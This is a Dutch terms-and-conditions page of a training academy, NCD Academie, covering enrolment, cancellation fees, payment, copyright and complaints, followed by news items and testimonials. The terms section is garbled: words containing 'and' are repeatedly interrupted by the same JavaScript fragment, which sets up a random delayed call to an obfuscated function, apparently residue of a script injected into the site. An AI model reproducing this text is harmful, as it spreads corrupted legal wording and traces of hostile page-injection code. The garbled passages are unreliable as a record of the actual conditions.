Definities

NCD Academie

Waar in onze bepalingen wordt gesproken over NCD Academie dient hieronder te worden verstaan de rechtspersoon waarbinnen NCD Academie haar activiteiten uitoefent.

Aanmelding

Aanmelding kan slechts geschieden door gebruikmaking het inschrijfformulier op de website of via info@NCDacademie.nl. Slechts volledig ingevulde overeenkomsten worden in behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling genomen. De overeenkomst dient te worden ondertekend en eventueel door een firmastempel te worden voorzien door diegenen, die voor betaling van het lesgeld aansprakelijk zijn. Dit geldt ook voor de werkgever die voor één of meer werknemers een overeenkomst aangaat. De inschrijving wordt op het ogenblik van ontvangst van de overeenkomst door NCD Academie aanvaard, tenzij het tegendeel schriftelijk aan de deelnemer wordt meegedeeld.

Trainingsduur en opzegging

Men verbindt zich bij de inschrijving voor de gehele training of workshop. Voor trainingen en workshops geldt de volgende annuleringsregeling. Indien de training/workshop na de geplandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande startdatum wordt geannuleerd, is de prijs van het aantal gegeven colleges verschuldigd, vermeerderd met een opzegvergoeding van 35% over de totale prijs. De totaal verschuldigde kosten zullen niet hoger zijn dan die van de totale prijs. Het wegblijven bij een training/workshop wordt niet aangemerkt als het opzeggen of beëindigen van een training/workshop. Bij annulering binnen 10 dagen na verzending van de uitnodiging en het rooster worden geen kosten in rekening gebracht. Bij annulering meer dan 10 dagen na verzending van de uitnodiging wordt 10% van het trainings-/workshopgeld in rekening gebracht. Bij annulering na de geplandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande startdatum hanteren wij eerder genoemde regeling. De opdrachtgever heeft het recht om kosteloos een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere deelnemer aan de training/workshop plaats te laten nemen in overleg met NCD Academie.

Opzegging dient schriftelijk te geschieden (opzegging uitsluitend per éérste dag van de volgende maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and). De overeenkomst wordt te allen tijde onmiddellijk ontbonden bij het overlijden van de deelnemer. De wederzijdse rechten en verplichtingen, voortvloeiende uit deze overeenkomst, eindigen zodra deze is ontbonden.

Betaling lesgeld

Het lesgeld dient vooruit te worden betaald; ineens of in termijnen. Hiervoor ontvangt u facturen. Indien de contractant, als gevolg van een bijzondere omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheid, niet meer (volledig) aan de betalingsverplichting kan voldoen, kan hij zich tot NCD Academie wenden met het verzoek om een betalingsregeling. Een verzoek hiertoe dient aangetekend te worden ingediend. Indien NCD Academie met het verzoek instemt, wordt de betalingsregeling schriftelijk overeengekomen.

Boeken

Alle benodigde lesmaterialen zullen door NCD Academie worden verstrekt.

Auteurs- en eigendomsrecht

Van het door NCD Academie verstrekte lesmateriaal blijven alle rechten aan haar voorbehouden. Niets uit de uitgave(n) mag worden verveelvoudigd, opgeslagen in een geautomatiseerd gegevensbestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and of openbaar gemaakt in enigerlei vorm of in enigerlei wijze, hetzij elektronisch, mechanisch, door fotokopieën, opnamen of op enig andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere wijze zonder voorafgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande schriftelijke toestemming van NCD Academie. Het is niet toegestaan het lesmateriaal aan derden ter beschikking te stellen.

Verklaring van deelname

Indien u minimaal 80% van de lessen heeft bijgewoond, kunt u op verzoek een verklaring van deelname ontvangen.

Algemeen

  • Voor lesadressen, lestijden en lesgelden dient u het inlegblad of de website te raadplegen.
  • Wij houden ons te allen tijde het recht voor wijzigingen aan te brengen m.b.t. de gegevens in de studiegids, prijslijst en website.
  • Bij wanbetaling komen alle kosten, zoals kosten door renteverlies, incasso-, gerechts-, en buitengerechtelijke kosten, voor rekening van de inschrijver.
  • De studieleiding houdt zich het recht voor, onder opgave van redenen, een opleiding te annuleren.

Beroep

Indien de deelnemer klachten heeft over de kwaliteit van de opleiding en/of meent dat de onderwijsinstelling de verplichtingen, voortvloeiend uit de overeenkomst, niet nakomt, kan schriftelijk de bemiddeling van de Geschillencommissie G.H. Teunissen Beheer BV worden ingeroepen. U wordt aangeraden een kopie van de correspondentie die over de klacht in gevoerd, bij deze brief in te sluiten. Het adres is:
Geschillencommissie G.H. Teunissen Beheer BV,
Wezelhof 9
7064 CX  Silvolde

laatste nieuws

Paspoort naar succes 15 juli 2021 in Arnhem 11 juli 2019

Waar een wil is maken we een weg! Ben jij klaar om eens op […]

lees meer
Van werkstress naar werkplezier 15 januari 2018

Woensdag 16 juni 2021 in Arnhem. De inspirerende training “Van werkstress naar werkplezier”. Wie […]

lees meer

reacties van deelnemers

Genoten van de reis die ik met jou heb mogen maken. Genoten van jouw drive en bovenal de unieke boodschap die je brengt.
Voor elke reis heb je een paspoort nodig. Bij die met jou is dat niet anders. Het was een reis die langs verschillende aandachtspunten gaat. Met name om te leren dat we meer in onze mars hebben dan we in eerste instantie denken. Het is een reis waarbij de Nederlandse nuchterheid, bescheidenheid achterwege gelaten mag worden.
We mogen, moeten volledig uit onze schulp komen! 't Wordt zo een reis die de zelfkennis vergroot. Dat is op zijn beurt de kennis die van belang is om je optimaal te kunnen presenteren bij een broodheer. Met je fysieke paspoort in de handen gevuld met persoonlijke kwaliteiten kan de reid dan ook maar een eindpunt hebben, "SUCCES". The place to-be.

Jos Brunink | Realization of Improvements

Geert is als een frisse wind, hij laat je op een ondersteboven-, achterstevoren-manier kijken naar alledaagse zaken. Kijken op een manier die je al sinds je kindertijd afgeleerd hebt, heerlijk! Hij is als trainer één brok energie en inspireert als geen ander. Ik kan iedereen aanraden bij hem een workshop te volgen.

Liesbeth ter Braak | ANT Neuro BV

Power, energie, anders denken, bevlogen. Met recht iemand die kan inspireren om het anders te doen. Niet voor niets begint zijn presentatie met: als je doet wat je altijd deed, krijg je wat je altijd kreeg. Ik kreeg energie en vooral de behoefte om het anders te doen, niet morgen, maar nu!

Janneke Knuiman | Facilitair manager
aanmelden nieuwsbrief